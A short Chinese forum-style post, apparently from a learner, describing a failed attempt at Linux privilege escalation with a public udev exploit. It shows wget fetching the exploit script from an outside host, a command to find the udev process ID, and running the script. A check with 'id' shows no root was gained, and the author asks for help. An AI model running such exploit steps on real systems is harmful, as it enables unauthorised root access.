1.下载攻击脚本
[test@H0f ~]$ wget http://www.extmail .org/source/exploit-udev-8478
--2018-04-02 01:21:00-- http://www.extmail/
Resolving www.extmail... failed: Name or service not known.
wget: unable to resolve host address “www.extmail”
--2018-04-02 01:21:00-- http://.org/source/exploit-udev-8478
Resolving .org... failed: Name or service not known.
wget: unable to resolve host address “.org”
[test@H0f ~]$ wget http://www.extmail.org/source/exploit-udev-8478
--2018-04-02 01:21:14-- http://www.extmail.org/source/exploit-udev-8478
Resolving www.extmail.org... 124.172.184.131
Connecting to www.extmail.org|124.172.184.131|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3367 (3.3K) [application/octet-stream]
Saving to: “exploit-udev-8478” 100%[===============================================================================> 2018-04-02 01:21:15 (351 KB/s) - “exploit-udev-8478” saved [3367/3367]
2.获得udev进程号
[test@H0f ~]$ ps ax|grep udev|grep -v grep|awk {'print $1'}
3.获得udev进程号,然后将此数字减1作为exploit-udev-8478的参数,执行脚本
[test@H0f ~]$ sh exploit-udev-
suid.c: In function ‘main’:
suid.c:: warning: incompatible implicit declaration of built-in function ‘execl’
4.输入id进行验证
sh-4.1$ id
uid=(test) gid=(test) groups=(test) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
多次实验仍未成功,大佬看到求指点,应该是我的linux版本问题把